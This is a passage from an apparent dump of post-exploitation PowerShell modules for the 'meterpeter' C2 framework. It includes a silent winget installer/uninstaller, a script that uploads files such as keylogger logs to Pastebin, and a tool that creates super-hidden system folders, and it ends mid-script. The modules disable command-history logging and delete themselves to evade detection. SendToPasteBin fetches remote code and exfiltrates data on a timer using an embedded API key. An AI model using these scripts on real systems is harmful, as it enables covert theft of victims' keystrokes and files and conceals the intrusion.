You cannot pipe objects into Invoke-Winget.ps1\r\n\r\n.OUTPUTS\r\n   * Manage applications from microsoft store.\r\n\r\n   Nome                                    ID                                       Versão       \r\n   ---------------------------------------------------------------------------------------------\r\n   Netflix                                 4DF9E0F8.Netflix_mcm4njqhnhss8           6.98.1805.0\r\n   ShareX                                  ShareX.ShareX                            13.4.0\r\n   AMD Software                            AMD Catalyst Install Manager             9.0.000.8\r\n   MyASUS-Service Center                   B9ECED6F.MyASUS_qmba6cd70vzyy            3.3.11.0\r\n   ASUS ZenLink                            B9ECED6F.ZenSync_qmba6cd70vzyy           1.0.7.0\r\n   Battle.net                              Battle.net                               Unknown\r\n   Conexant HD Audio                       CNXT_AUDIO_HDA                           8.66.95.69\r\n\r\n.LINK\r\n   https://github.com/r00t-3xp10it/meterpeter\r\n   https://learn.microsoft.com/en-us/windows/package-manager/winget\r\n#>\r\n\r\n\r\n[CmdletBinding(PositionalBinding=$false)] param(\r\n   [string]$AutoDelete=\"off\",\r\n   [string]$Program=\"off\",\r\n   [string]$Action=\"list\",\r\n   [string]$Id=\"off\",\r\n   [int]$Delay='1700',\r\n   [switch]$Force\r\n)\r\n\r\n\r\n$cmdletver = \"v1.0.4\"\r\n$ErrorActionPreference = \"SilentlyContinue\"\r\n## Disable Powershell Command Logging for current session.\r\nSet-PSReadlineOption –HistorySaveStyle SaveNothing|Out-Null\r\n$OperativeSystem = [System.Environment]::OSVersion.Version\r\n$host.UI.RawUI.WindowTitle = \"@Invoke-WinGet $cmdletver\"\r\n\r\nIf($AutoDelete -iMatch '^(off)$')\r\n{\r\n   write-host \"* Manage applications from microsoft store.`n\" -ForegroundColor Green\r\n}\r\n\r\n## Check operative system version\r\n$OsVersion = $OperativeSystem.Major\r\nIf(-not($OsVersion -match '^(10|11)$'))\r\n{\r\n   write-host \"   > 
Error: Operative system version '$OsVersion' not suported!`n\" -ForegroundColor Red\r\n   return\r\n}\r\n\r\n## Check operative system build\r\n$OsBuild = $OperativeSystem.Build\r\nIf(($OsVersion -match '^(10)$') -and ($OsBuild -lt \"16299\"))\r\n{\r\n   write-host \"   > Error: Operative system build '$OsBuild' not suported!`n\" -ForegroundColor Red\r\n   return\r\n}\r\n\r\n## Make sure Winget application is installed\r\n$CheckInstall = (Get-Command \"winget\" -EA SilentlyContinue).Source\r\nIf([string]::IsNullOrEmpty($CheckInstall))\r\n{\r\n   If($Force.IsPresent)\r\n   {\r\n      ## Download and install winget application using the latest release available.\r\n      Add-AppxPackage \"https://github.com/microsoft/winget-cli/releases/latest/download/Microsoft.DesktopAppInstaller_8wekyb3d8bbwe.msixbundle\"\r\n   }\r\n   Else\r\n   {\r\n      write-host \"   > Error: Command line tool 'winget' missing!`n\" -ForegroundColor Red\r\n      return\r\n   }\r\n}\r\n\r\n\r\nIf($Action -iMatch '^(list)$')\r\n{\r\n\r\n   <#\r\n   .SYNOPSIS\r\n      list installed packets [local PC]\r\n      :meterpeter:post:msstore> list\r\n   #>\r\n\r\n   ## Command\r\n   winget list\r\n}\r\n\r\n\r\nIf($Action -iMatch '^(discover)$')\r\n{\r\n\r\n   <#\r\n   .SYNOPSIS\r\n      search for application [msstore]\r\n      :meterpeter:post:msstore> discover\r\n   #>\r\n\r\n   ## Cmdlet parameters checks\r\n   If($Program -iMatch 'off')\r\n   {\r\n      write-host \"   > Error: -program parameter required!`n\" -ForegroundColor Red\r\n      return\r\n   }\r\n\r\n   ## Search for pacakage in microsoft store\r\n   winget search --name \"$Program\" --exact|Out-File -FilePath \"$Env:TMP\\Skynet.log\" -Force\r\n   $Pacakage = (Get-Content -Path \"$Env:TMP\\Skynet.log\"|Select-String -Pattern \"$Program\")\r\n   If([string]::IsNullOrEmpty($Pacakage))\r\n   {\r\n      write-host \"   > Error: program '$Program' not found in msstore!`n\" -ForegroundColor Red\r\n   }\r\n   Else\r\n   {\r\n      ## Sanitize 
command output\r\n      $SanitizeOutput = (Get-Content -Path \"$Env:TMP\\Skynet.log\") -replace '(\\\\|/|£)',''\r\n      echo $SanitizeOutput\r\n   }\r\n\r\n   ## CleanUp\r\n   Remove-Item -Path \"$Env:TMP\\Skynet.log\" -Force\r\n}\r\n\r\n\r\nIf($Action -iMatch '^(install)$')\r\n{\r\n\r\n   <#\r\n   .SYNOPSIS\r\n      Install application [msstore]\r\n      :meterpeter:post:msstore> install\r\n\r\n   .NOTES\r\n      Parameters -program and -id are mandatory\r\n   #>\r\n\r\n   ## Cmdlet parameters checks\r\n   If(($Program -iMatch 'off') -or ($Id -iMatch 'off'))\r\n   {\r\n      write-host \"   > Error: -program and -id parameters required!`n\" -ForegroundColor Red\r\n      return\r\n   }\r\n\r\n   ## Search for Pacakage in microsoft store\r\n   $IsAvailable = (Winget search --name \"$Program\" --exact|Select-String -Pattern \"$Program\")\r\n   If([string]::IsNullOrEmpty($IsAvailable))\r\n   {\r\n      write-host \"   > Error: program '$Program' not found in msstore!`n\" -ForegroundColor Red\r\n      return      \r\n   }\r\n\r\n   ## Silent install program from microsoft store\r\n   winget install --name \"$Program\" --id \"$Id\" --silent --force --accept-package-agreements --accept-source-agreements --disable-interactivity\r\n   If($? 
-match 'false')\r\n   {\r\n      write-host \"`n   > Fail: Installing -program '$Program' -id '$Id' from msstore`n\" -ForegroundColor Red\r\n      return      \r\n   }\r\n}\r\n\r\n\r\nIf($Action -iMatch '^(uninstall)$')\r\n{\r\n\r\n   <#\r\n   .SYNOPSIS\r\n      Uninstall application [local PC]\r\n      :meterpeter:post:msstore> uninstall\r\n\r\n   .NOTES\r\n      Parameters -program and -id are mandatory\r\n   #>\r\n\r\n   ## Cmdlet parameters checks\r\n   If(($Program -iMatch 'off') -or ($Id -iMatch 'off'))\r\n   {\r\n      write-host \"   > Error: -program and -id parameters required!`n\" -ForegroundColor Red\r\n      return\r\n   }\r\n\r\n   ## Search for package locally\r\n   $IsAvailable = (Winget list|Select-String -Pattern \"$Program\")\r\n   If([string]::IsNullOrEmpty($IsAvailable))\r\n   {\r\n      write-host \"   > Error: program '$Program' not found! [local]`n\" -ForegroundColor Red\r\n      return      \r\n   }\r\n\r\n   ## Silent uninstall program from local machine\r\n   winget uninstall --name \"$Program\" --id \"$Id\" --silent --force --purge --disable-interactivity\r\n   If($? -match 'false')\r\n   {\r\n      write-host \"`n   > Fail: Uninstalling -program '$Program' -id '$Id' [local]`n\" -ForegroundColor Red\r\n      return\r\n   }\r\n}\r\n\r\n\r\n## Give extra time to finish tasks\r\nStart-Sleep -Milliseconds $Delay\r\n\r\n## CleanUp\r\nIf($AutoDelete -iMatch '^(on)$')\r\n{\r\n   ## Auto Delete this cmdlet in the end ...\r\n   Remove-Item -LiteralPath $MyInvocation.MyCommand.Path -Force\r\n}"
  },
  {
    "path": "mimiRatz/SendToPasteBin.ps1",
    "content": "﻿<#\r\n.SYNOPSIS\r\n   Get filepath contents and paste it to pastebin.\r\n    \r\n   Author: @r00t-3xp10it\r\n   Tested Under: Windows 10 (19042) x64 bits\r\n   Required Dependencies: Inv`oke-We`bRequ`est {native}\r\n   Optional Dependencies: Out-PasteBin.ps1 {auto}\r\n   PS cmdlet Dev version: v1.1.5\r\n   \r\n.DESCRIPTION\r\n   Uses Out-PasteBin.ps1 cmdlet to take the contents of -filepath 'string'\r\n   and creates a new pastebin paste from it on the sellected account with\r\n   sellected time intervals (120 sec) a max of 20 times (20 pastes max)\r\n\r\n.NOTES\r\n   PasteBin accepts the max of 20 pastes per day on 'free' accounts.\r\n   So -MaxPastes 'int' and -TimeOut 'int' must be careful calculated.\r\n   Eg: -maxpastes '20' -timeout '1' will reach 20 pastes in 20 sec\r\n   \r\n.Parameter FilePath\r\n   The filepath to send to pastebin\r\n\r\n.Parameter PastebinUsername\r\n   PasteBin UserName to authenticate to\r\n\r\n.Parameter PastebinPassword\r\n   PasteBin Password to authenticate to\r\n\r\n.Parameter PastebinDeveloperKey\r\n   The pasteBin API key to authenticate with\r\n\r\n.Parameter MaxPastes\r\n   The max number of pastes to create (max: 20)\r\n\r\n.Parameter TimeOut\r\n   Create paste each xxx seconds (min: 120)\r\n   Remark: No time limmit if -maxpastes '1'\r\n\r\n.EXAMPLE\r\n   PS C:\\> Get-Help .\\SendToPasteBin.ps1 -full\r\n   Access this cmdlet comment based help!\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\SendToPasteBin.ps1 -FilePath \"test.log\" -PastebinUsername \"r00t-3xp10it\" -PastebinPassword \"MyS3cr3TPassword\"\r\n   Get the contents of -filepath 'string' and creates a new pastebin paste from it on the sellected pastebin account.\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\SendToPasteBin.ps1 -FilePath \"test.log\" -timeout \"120\" -maxpastes \"10\" -PastebinUsername \"r00t-3xp10it\" -PastebinPassword \"MyS3cr3TPassword\"\r\n   Get the contents of -filepath 'string' and creates a new pastebin paste from it each 120 seconds a max of 10 
pastes on the sellected pastebin account.\r\n\r\n.INPUTS\r\n   None. You cannot pipe objects into SendToPasteBin.ps1\r\n\r\n.OUTPUTS\r\n   * Out-PasteBin aux cmdlet\r\n   * Downloading Out-PasteBin cmdlet ..\r\n     + Maxpastes_Counter  : 1º paste\r\n\r\n   * Out-PasteBin cmdlet by BankSecurity\r\n   * PastebinDeveloperKey : 1ab4a1a4e39c94db4f653127a45e7159\r\n     + PastebinUsername   : r00t-3xp10it\r\n     + PasteTitle         : SKYNET_15_33_15\r\n   * PasteBin Url: https://pastebin.com/jVT6BKWL\r\n   * PasteBin accepts the max of 20 pastes per day.\r\n\r\n     + Maxpastes_Counter  : 2º paste\r\n\r\n   * Out-PasteBin cmdlet by BankSecurity\r\n   * PastebinDeveloperKey : 1ab4a1a4e39c94db4f653127a45e7159\r\n     + PastebinUsername   : r00t-3xp10it\r\n     + PasteTitle         : SKYNET_15_35_15\r\n   * PasteBin Url: https://pastebin.com/GiK9DASD\r\n   * PasteBin accepts the max of 20 pastes per day.\r\n  \r\n.LINK\r\n   https://github.com/r00t-3xp10it/meterpeter\r\n   https://github.com/r00t-3xp10it/redpill/blob/main/bin/Out-Pastebin.ps1\r\n#>\r\n\r\n\r\n#CmdLet Global variable declarations!\r\n[CmdletBinding(PositionalBinding=$false)] param(\r\n   [string]$PastebinDeveloperKey='1ab4a1a4e39c94db4f653127a45e7159',\r\n   [string]$PastebinUsername=\"r00t-3xp10it\",\r\n   [string]$PasteTitle=\"$Env:COMPUTERNAME\",\r\n   [string]$FilePath=\"$Env:TMP\\void.log\",\r\n   [string]$PastebinPassword=\"s3cr3t\",\r\n   [string]$Egg=\"False\",\r\n   [int]$MaxPastes='1',\r\n   [int]$TimeOut='120'\r\n)\r\n\r\n\r\n$cmdletVersion = \"v1.1.5\"\r\n$ErrorActionPreference = \"SilentlyContinue\"\r\n#Disable Powershell Command Logging for current session.\r\nSet-PSReadlineOption –HistorySaveStyle SaveNothing|Out-Null\r\n$host.UI.RawUI.WindowTitle = \"SendToPasteBin $cmdletVersion\"\r\nIf($Egg -ieq \"False\")\r\n{\r\n   write-host \"`n* SendToPasteBin aux cmdlet\" -ForegroundColor Green\r\n}\r\n\r\n## Limmit ranges\r\nIf($MaxPastes -gt 20)\r\n{\r\n   ## Max pastes allowed\r\n   
[int]$MaxPastes = 10\r\n}\r\n\r\n## Min loop jump timeout\r\nIf($TimeOut -lt 120)\r\n{\r\n   ## No time limmit if 1 paste\r\n   If($MaxPastes -gt 1)\r\n   {\r\n      [int]$TimeOut = 120\r\n   }\r\n}\r\n\r\n\r\nFor($i=0; $i -lt $MaxPastes; $i++)\r\n{\r\n   Start-Sleep -Seconds $TimeOut ## Loop jump timeout\r\n   If(-not(Test-Path -Path \"$Env:TMP\\Out-Pastebin.ps1\" -EA SilentlyContinue))\r\n   {\r\n      ## Download Out-Pastebin cmdlet from my github repository\r\n      If($Egg -ieq \"False\"){write-host \"* Downloading Out-PasteBin cmdlet ..\" -ForegroundColor Green}\r\n      iwr -uri \"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/Out-Pastebin.ps1\" -OutFile \"$Env:TMP\\Out-Pastebin.ps1\"|Unblock-File   \r\n   }\r\n\r\n   If($Egg -ieq \"False\")\r\n   {\r\n      ## Display OnScreen the loop counter!\r\n      write-host \"  + \" -ForegroundColor DarkYellow -NoNewline\r\n      write-host \"Maxpastes_Counter  : \" -NoNewline\r\n      write-host \"${i}\" -ForegroundColor Green -NoNewline\r\n      write-host \"º paste\"\r\n   }\r\n\r\n   ## Make sure that -FilePath 'file' exists\r\n   If(Test-path -Path \"$FilePath\" -EA SilentlyContinue)\r\n   {\r\n      ## Parse filepath data (@Meterpeter keylogger)\r\n      $ParseDatas = (Get-Content -Path \"$FilePath\")\r\n      echo $ParseDatas > \"$Env:TMP\\ParseData.log\"\r\n\r\n      $rand = (Get-Date -Format 'HH:mm:ss') -replace ':','_'\r\n      Import-Module -Name \"$Env:TMP\\Out-PasteBin.ps1\" -Force\r\n      Out-Pastebin -InputObject $(Get-Content -Path \"$Env:TMP\\ParseData.log\") -PasteTitle \"${PasteTitle}_${rand}\" -ExpiresIn \"1W\" -Visibility \"Private\" -PastebinUsername \"$PastebinUsername\" -PastebinPassword \"$PastebinPassword\" -PastebinDeveloperKey \"$PastebinDeveloperKey\"\r\n\r\n      ## Local Cleanup\r\n      Remove-Item -Path \"$Env:TMP\\parsedata.log\" -Force\r\n   }\r\n}\r\n\r\n\r\n## Cleanup\r\nRemove-Item -Path \"$Env:TMP\\parsedata.log\" -Force\r\nRemove-Item -Path 
\"$Env:TMP\\Out-PasteBin.ps1\" -Force\r\nIf($Egg -ieq \"True\")\r\n{\r\n   ## Auto-Delete this cmdlet (@Meterpeter C2 internal function)\r\n   Remove-Item -LiteralPath $MyInvocation.MyCommand.Path -Force\r\n}"
  },
  {
    "path": "mimiRatz/SuperHidden.ps1",
    "content": "﻿<#\r\n.SYNOPSIS\r\n   Query\\Create\\Delete super hidden system folders\r\n\r\n   Author: @r00t-3xp10it\r\n   Tested Under: Windows 10 (19043) x64 bits\r\n   Required Dependencies: attrib {native}\r\n   Optional Dependencies: none\r\n   PS cmdlet Dev version: v1.2.18\r\n\r\n.DESCRIPTION\r\n   This cmdlet allow users to Query\\Create\\Delete super hidden folders.\r\n   Super hidden folders contains 'Hidden, System' attributes set and it\r\n   does not show-up in explorer even if 'show hidden files' are activated.\r\n\r\n.NOTES\r\n   This cmdlet allow users to search for 'hidden' or 'super hidden' directorys\r\n   in input location (recursive, non-recursive), creates 'super hidden' folder,\r\n   'hidde folder', 'un-hidde folder' and 'delete' super hidden directorys ..\r\n   Remark: Admin privileges required to create folders outside %userprofile%.\r\n   Remark: The -Recursive 'true' arg requires of an -Directory input by user.\r\n\r\n.Parameter Action\r\n   Accepts arguments: query, hidden, visible, delete (default: query)\r\n\r\n.Parameter Directory\r\n   The query\\create\\delete folder directory path (default: false)\r\n\r\n.Parameter FolderName\r\n   The folder name to query\\create\\delete (default: false)\r\n\r\n.Parameter Recursive\r\n   Search super hidden folders recursive? 
(default: false)\r\n\r\n.Parameter Attributes\r\n   The directory attributes (default: Hidden, System)\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\SuperHidden.ps1 -Action Query\r\n   Search for 'Hidden, System' folders on predefined locations\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\SuperHidden.ps1 -Action Query -Directory $Env:TMP\r\n   Search for 'Hidden, System' folders on %TMP% location\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\SuperHidden.ps1 -Action Query -Directory $Env:TMP -Recursive true\r\n   Search for 'Hidden, System' folders on %TMP% location 'recursive' (sub-folders)\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\SuperHidden.ps1 -Action Query -Directory $Env:TMP -attributes Hidden\r\n   Search for folders with 'Hidden' attribute (not super Hidden, System) on %TMP%\r\n   \r\n.EXAMPLE\r\n   PS C:\\> .\\SuperHidden.ps1 -Action Query -Directory $Env:TMP -FolderName vault\r\n   Search for 'Hidden, System' folders on %TMP% location with the name of 'vault'\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\SuperHidden.ps1 -Action Hidden -Directory $Env:TMP -FolderName vault\r\n   Create\\Modify 'Hidden, System' folder on %TMP% location with the name of 'vault'   \r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\SuperHidden.ps1 -Action Visible -Directory $Env:TMP -FolderName vault\r\n   Create\\modify 'VISIBLE, System' folder on %TMP% location with the name of 'vault'    \r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\SuperHidden.ps1 -Action Delete -Directory $Env:TMP -FolderName vault\r\n   Delete the super hidden 'Hidden, System' folder of %TMP% with the name of 'vault'\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\SuperHidden.ps1 -Action Query -Directory $Env:TMP -Attributes \"(Hidden|System)\" -Recursive true\r\n   Search for 'Hidden' OR 'System' directorys on %TMP% location in 'recursive' mode (scan sub-folders) \r\n\r\n.INPUTS\r\n   None. 
You cannot pipe objects into SuperHidden.ps1\r\n\r\n.OUTPUTS\r\n   FullName                                CreationTime        LastAccessTime                      Attributes\r\n   --------                                ------------        --------------                      ----------\r\n   C:\\Users\\pedro\\AppData\\Local\\Temp\\vault 15/11/2021 07:17:42 15/11/2021 07:20:44  Hidden, System, Directory\r\n\r\n.LINK\r\n   https://github.com/r00t-3xp10it/meterpeter/releases/tag/v2.10.10\r\n#>\r\n\r\n\r\n#CmdLet Global variable declarations!\r\n[CmdletBinding(PositionalBinding=$false)] param(\r\n   [string]$Attributes=\"Hidden, System\",\r\n   [string]$FolderName=\"false\",\r\n   [string]$Directory=\"false\",\r\n   [string]$Recursive=\"false\",\r\n   [string]$Action=\"Query\"\r\n)\r\n\r\n\r\n$ErrorActionPreference = \"SilentlyContinue\"\r\n#Disable Powershell Command Logging for current session.\r\nSet-PSReadlineOption –HistorySaveStyle SaveNothing|Out-Null\r\n$IsClientAdmin = [bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -Match \"S-1-5-32-544\")\r\nIf($Action -ieq \"Query\" -and $Directory -ieq \"false\")\r\n{\r\n   If($Attributes -iMatch '^(Hidden)$')\r\n   {\r\n      Write-Host \"Searching hidden folders in common locations ..\" -ForegroundColor Blue \r\n   }\r\n   ElseIf($Attributes -iMatch '^(Hidden, System)$')\r\n   {\r\n      Write-Host \"Searching super hidden folders in common locations ..\" -ForegroundColor Blue\r\n   }\r\n   Else\r\n   {\r\n      Write-Host \"Searching '$Attributes' folders in common locations ..\" -ForegroundColor Blue    \r\n   }\r\n}\r\n\r\n\r\nWrite-Host \"`n\"\r\n#Build ramdom search output DataTable!\r\n$supertable = New-Object System.Data.DataTable\r\n$supertable.Columns.Add(\"Attributes     \")|Out-Null\r\n$supertable.Columns.Add(\"Length\")|Out-Null\r\n$supertable.Columns.Add(\"FullName\")|Out-Null\r\n$supertable.Columns.Add(\"LastAccessTime\")|Out-Null\r\n\r\n\r\nIf($Action -ieq \"Query\")\r\n{\r\n\r\n  
 <#\r\n   .SYNOPSIS\r\n      Author: @r00t-3xp10it\r\n      Helper - Query for hidden folders with 'hidden, system' attributes set.\r\n      \r\n   .NOTES\r\n      This function allow users to search for hidden folders on predefined locations\r\n      or accepts the absoluct path of the directory to query (not recursive), it also\r\n      accepts the '-FolderName' parameter to search for sellected directory existence.\r\n      Remark: The -Recursive 'true' argument requires of an -Directory input by user.\r\n\r\n   .OUTPUTS\r\n      Attributes      Length  FullName                                 LastAccessTime                         \r\n      --------------- ------  --------                                 --------------\r\n      Hidden, System  0       C:\\Program Files\\Windows Sidebar         11/18/2021 09:32:55\r\n      Hidden, System  2       C:\\Program Files (x86)\\Windows Sidebar   11/18/2021 03:13:06\r\n      Hidden, System  61      C:\\Users\\pedro\\AppData\\Local\\Temp\\vault  11/18/2021 09:34:10\r\n   #>\r\n\r\n   If($Directory -ieq \"false\")\r\n   {\r\n\r\n      $CommonLocations = @(\r\n         \"$Env:TMP\",\r\n         \"$Env:APPDATA\",\r\n         \"$Env:USERPROFILE\",         \r\n         \"$Env:LOCALAPPDATA\",\r\n         \"$Env:PROGRAMFILES\",\r\n         \"${Env:PROGRAMFILES(X86)}\",\r\n         \"$Env:USERPROFILE\\Desktop\",\r\n         \"$Env:USERPROFILE\\Documents\"\r\n      )\r\n\r\n      ForEach($Item in $CommonLocations)\r\n      {\r\n         #Search for hidden,system folders on predefined locations (random search)\r\n         $RawList = (Get-ChildItem -Path \"$Item\" -Force | Select-Object * | Where-Object { \r\n            $_.PSIsContainer -eq 'True' -and $_.Attributes -iMatch \"$Attributes\"\r\n         }).FullName\r\n\r\n         If($RawList)\r\n         {\r\n            ForEach($Entry in $RawList)\r\n            {\r\n\r\n               #Add each indevidual entry to database now.\r\n               $DirLength = (Get-ChildItem -Path 
\"$Entry\").Length\r\n               $LastAccessTime = (Get-ChildItem -Path \"$Entry\").LastAccessTime | Select-Object -Last 1\r\n               $supertable.Rows.Add(\"$Attributes\",\"$DirLength\",\"$Entry\",\"$LastAccessTime\")|Out-Null\r\n            }\r\n         }\r\n      }\r\n\r\n      #Display DataTable contents onscreen\r\n      $supertable | Format-Table -AutoSize | Out-String -Stream | Select-Object -Skip 1 | ForEach-Object {\r\n         $stringformat = If($_ -Match '^(Attributes)')\r\n         {\r\n            @{ 'ForegroundColor' = 'Green' }\r\n         }\r\n         Else\r\n         {\r\n            @{ 'ForegroundColor' = 'White' }\r\n         }\r\n         Write-Host @stringformat $_\r\n      }\r\n\r\n   }\r\n   ElseIf($Directory -ne \"false\")\r\n   {\r\n\r\n      If(-not(Test-Path -Path \"$Directory\" -EA SilentlyContinue))\r\n      {\r\n         #Making sure that the directory input exists before go any further..\r\n         Write-Host \"error: not found: '$Directory'`n\" -ForegroundColor Red -BackgroundColor Black\r\n         exit #Exit SuperHidden\r\n      }\r\n   \r\n      If($FolderName -ne \"false\")\r\n      {\r\n          If($Recursive -ieq \"true\")\r\n         {\r\n            #FolderName parameter user input recursive search function\r\n            $SHdb = Get-ChildItem -Path \"$Directory\" -Recurse -Force| Select-Object * |\r\n               Where-Object { $_.PSIsContainer -eq 'True' -and $_.Name -iMatch \"$FolderName\" -and\r\n               $_.Attributes -iMatch \"$Attributes\" -and $_.FullName -iNotMatch 'Packages'\r\n            } | Select-Object FullName,CreationTime,LastAccessTime,Attributes | Format-Table -AutoSize\r\n         }\r\n         Else\r\n         {\r\n            #FolderName parameter user input search function\r\n            $SHdb = Get-ChildItem -Path \"$Directory\" -Force| Select-Object * |\r\n               Where-Object { $_.PSIsContainer -eq 'True' -and $_.Name -iMatch \"$FolderName\" -and $_.Attributes -iMatch 
\"$Attributes\"\r\n            } | Select-Object FullName,CreationTime,LastAccessTime,Attributes | Format-Table -AutoSize         \r\n         }\r\n\r\n         If(-not($SHdb))\r\n         {\r\n            Write-Host \"Error: fail to match the search criteria.`n\" -ForegroundColor Red -BackgroundColor Black\r\n         }\r\n         Else\r\n         {\r\n            echo $SHdb\r\n         }\r\n\r\n      }\r\n      Else\r\n      {\r\n\r\n         If($Recursive -ieq \"true\")\r\n         {\r\n            #Query for hidden,system folders in -Directory argument location\r\n            $SHdb = Get-ChildItem -Path \"$Directory\" -Recurse -Force | Select-Object * |\r\n               Where-Object { $_.PSIsContainer -eq 'True' -and $_.Attributes -Match \"$Attributes\" -and $_.FullName -iNotMatch 'Packages'\r\n            } | Select-Object FullName,CreationTime,LastAccessTime,Attributes | Format-Table -AutoSize\r\n         }\r\n         Else\r\n         {\r\n            #Query for hidden,system folders in -Directory argument location\r\n            $SHdb = Get-ChildItem -Path \"$Directory\" -Force | Select-Object * |\r\n               Where-Object { $_.PSIsContainer -eq 'True' -and $_.Attributes -iMatch \"$Attributes\"\r\n            } | Select-Object FullName,CreationTime,LastAccessTime,Attributes | Format-Table -AutoSize         \r\n         }\r\n\r\n         If(-not($SHdb))\r\n         {\r\n            Write-Host \"Error: fail to match the search criteria.`n\" -ForegroundColor Red -BackgroundColor Black\r\n         }\r\n         Else\r\n         {\r\n            echo $SHdb\r\n         }\r\n\r\n      }\r\n   }\r\n\r\n}\r\n\r\n\r\nIf($Action -ieq \"Hidden\")\r\n{\r\n\r\n   <#\r\n   .SYNOPSIS\r\n      Author: @r00t-3xp10it\r\n      Helper - Create one hidden,system folder on sellected location!\r\n\r\n   .NOTES\r\n      This function creates or modify the sellected folder attributes.\r\n      Admin privileges required to create folders outside userprofile tree.\r\n   
#>\r\n\r\n   If($Directory -ieq \"false\")\r\n   {\r\n      $Directory = \"$Env:TMP\"\r\n   }\r\n\r\n   If($Directory -iMatch '^C:\\\\Windows' -or $Directory -iMatch '^C:\\\\Program Files')\r\n   {\r\n      If($IsClientAdmin -iMatch 'False')\r\n      {\r\n         #Making sure that the directory structure does not start with C:\\Windows if we have UserLand privs!\r\n         Write-Host \"Error: Admin privileges required to manipulate sellected directory.`n\" -ForegroundColor Red -BackgroundColor Black\r\n         exit #Exit @SuperHidden\r\n      }\r\n   }\r\n\r\n   If($FolderName -ieq \"false\"){$FolderName = \"vault\"}\r\n   If(-not(Test-Path -Path \"$Directory\\$FolderName\" -EA SilentlyContinue))\r\n   {\r\n      #Make sure that the directory\\folder exists\r\n      mkdir $Directory\\$FolderName -Force|Out-Null\r\n   }\r\n\r\n   try{#hidde sellected folder\r\n      attrib +s +h $Directory\\$FolderName\r\n   }catch{#Fail to modify sellected directory attributes\r\n      Write-Host \"Error: fail to change directory attributes.`n\" -ForegroundColor Red -BackgroundColor Black\r\n      exit #Exit SuperHidden\r\n   }\r\n\r\n   #Search for hidden,system folder created\\modified..\r\n   $SHdb = Get-ChildItem -Path \"$Directory\" -Force | Select-Object * |\r\n      Where-Object { $_.PSIsContainer -eq 'True' -and $_.Name -iMatch \"$FolderName\" -and $_.Attributes -iMatch 'Hidden, System'\r\n   } | Select-Object FullName,CreationTime,LastAccessTime,Attributes | Format-Table -AutoSize\r\n\r\n   If(-not($SHdb))\r\n   {\r\n      Write-Host \"Error: fail to match the search criteria.`n\" -ForegroundColor Red -BackgroundColor Black\r\n   }\r\n   Else\r\n   {\r\n      echo $SHdb\r\n   }\r\n\r\n}\r\n\r\n\r\nIf($Action -ieq \"Visible\")\r\n{\r\n\r\n   <#\r\n   .SYNOPSIS\r\n      Author: @r00t-3xp10it\r\n      Helper - Create one VISIBLE,system folder on sellected location!\r\n\r\n   .NOTES\r\n      This function creates or modify the sellected folder attributes.\r\n      Admin 
privileges required to create folders outside userprofile tree.\r\n   #>\r\n\r\n   If($Directory -ieq \"false\")\r\n   {\r\n      $Directory = \"$Env:TMP\"\r\n   }\r\n\r\n   If($Directory -iMatch '^C:\\\\Windows' -or $Directory -iMatch '^C:\\\\Program Files')\r\n   {\r\n      If($IsClientAdmin -iMatch 'False')\r\n      {\r\n         #Making sure that the directory structure does not start with C:\\Windows if we have UserLand privs!\r\n         Write-Host \"Error: Admin privileges required to manipulate sellected directory.`n\" -ForegroundColor Red -BackgroundColor Black\r\n         exit #Exit @SuperHidden\r\n      }\r\n   }\r\n\r\n   If($FolderName -ieq \"false\"){$FolderName = \"vault\"}\r\n   If(-not(Test-Path -Path \"$Directory\\$FolderName\" -EA SilentlyContinue))\r\n   {\r\n      #Make sure that the directory\\folder exists\r\n      mkdir $Directory\\$FolderName -Force|Out-Null\r\n   }\r\n\r\n   try{#UnHidde sellected folder\r\n      attrib -s -h $Directory\\$FolderName\r\n   }catch{#Fail to modify sellected directory attributes\r\n      Write-Host \"Error: fail to change directory attributes.`n\" -ForegroundColor Red -BackgroundColor Black\r\n      exit #Exit SuperHidden\r\n   }\r\n\r\n   #Search for VISIBLE,system folder created\\modified..\r\n   $SHdb = Get-ChildItem -Path \"$Directory\" -Force | Select-Object * |\r\n      Where-Object { $_.PSIsContainer -eq 'True' -and $_.Name -iMatch \"$FolderName\"\r\n   } | Select-Object FullName,CreationTime,LastAccessTime,Attributes | Format-Table -AutoSize\r\n\r\n   If(-not($SHdb))\r\n   {\r\n      Write-Host \"Error: fail to match the search criteria.`n\" -ForegroundColor Red -BackgroundColor Black\r\n   }\r\n   Else\r\n   {\r\n      echo $SHdb\r\n   }\r\n\r\n}\r\n\r\n\r\nIf($Action -ieq \"Delete\")\r\n{\r\n\r\n   <#\r\n   .SYNOPSIS\r\n      Author: @r00t-3xp10it\r\n      Helper - Delete one hidden,system folder on sellected location!\r\n\r\n   .NOTES\r\n      Admin privileges required to delete folders outside 
userprofile tree.\r\n   #>\r\n\r\n   If($FolderName -ieq \"false\")\r\n   {\r\n      #Make sure that the folder to delete exists\r\n      Write-Host \"Error: The 'delete' function requires -FolderName input ..`n\" -ForegroundColor Red -BackgroundColor Black\r\n      exit #Exit SuperHidden\r\n   }\r\n\r\n   If($Directory -ieq \"false\")\r\n   {\r\n      #Make sure that the directory tree to delete exists\r\n      Write-Host \"Error: The 'delete' function requires -Directory input ..`n\" -ForegroundColor Red -BackgroundColor Black\r\n      exit #Exit SuperHidden\r\n   }\r\n\r\n   If($Directory -iMatch '^C:\\\\Windows' -or $Directory -iMatch '^C:\\\\Program Files')\r\n   {\r\n      If($IsClientAdmin -iMatch 'False')\r\n      {\r\n         #Making sure that the directory structure does not start with C:\\Windows if we have UserLand privs!\r\n         Write-Host \"Error: Admin privileges required to manipulate sellected directory.`n\" -ForegroundColor Red -BackgroundColor Black\r\n         exit #Exit @SuperHidden\r\n      }\r\n   }\r\n\r\n   If(-not(Test-Path -Path \"$Directory\\$FolderName\" -EA SilentlyContinue))\r\n   {\r\n      #Make sure that the directory\\folder to delete exists\r\n      Write-Host \"Error: not found '$Directory\\$FolderName'`n\" -ForegroundColor Red -BackgroundColor Black\r\n      exit #Exit SuperHidden\r\n   }\r\n\r\n   try{#delete sellected folder\r\n      attrib -s -h 